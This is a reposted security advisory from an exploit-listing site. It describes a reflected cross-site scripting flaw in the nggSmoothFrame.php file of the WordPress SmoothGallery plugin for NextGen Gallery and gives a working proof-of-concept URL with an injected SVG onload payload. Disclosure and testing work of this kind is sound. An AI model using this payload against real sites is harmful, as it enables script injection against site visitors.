WordPress SmoothGallery for NextGen Gallery XSS

CVE	Category	Price	Severity
CVE-2011-2938	CWE-79	Not specified	High

Author	Risk	Exploitation Type	Date
Aliaksandr Hartsuyeu	High	Remote	2017-11-01

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017110002

Below is a copy:

WordPress SmoothGallery for NextGen Gallery XSS

-------------------------------------------
WordPress SmoothGallery - NextGen Gallery
                    XSS
         By SonnySpooks       
-------------------------------------------
1.             [About App]
-------------------------------------------
   NextGen Gallery is a plugin used for
  Smooth gallery modulation and appearance
            On Multiple Sites.
-------------------------------------------
2.            [Issue With It]
-------------------------------------------
 The File of nggSmoothFrame.php Carries.
   a parameter ?textShowCarousel= that
  reflects parses in the <script> area
  is easily effected by arbitrary code.
   
-------------------------------------------
3.         [Replication of attack]
-------------------------------------------
Example: "site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=0&textShowCarousel=</script><svg/onload=alert(/XSSPOSED/)>"
-------------------------------------------
              ________
             /\       \
            /  \       \
           /    \       \
          /      \_______\
          \      /       /
        ___\    /   ____/___
       /\   \  /   /\       \
      /  \   \/___/  \       \
     /    \       \   \       \
    /      \_______\   \_______\
    \      /       /   /       /
     \    /       /   /       /
      \  /       /\  /       /
       \/_______/  \/_______/    
-------------------------------------------

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum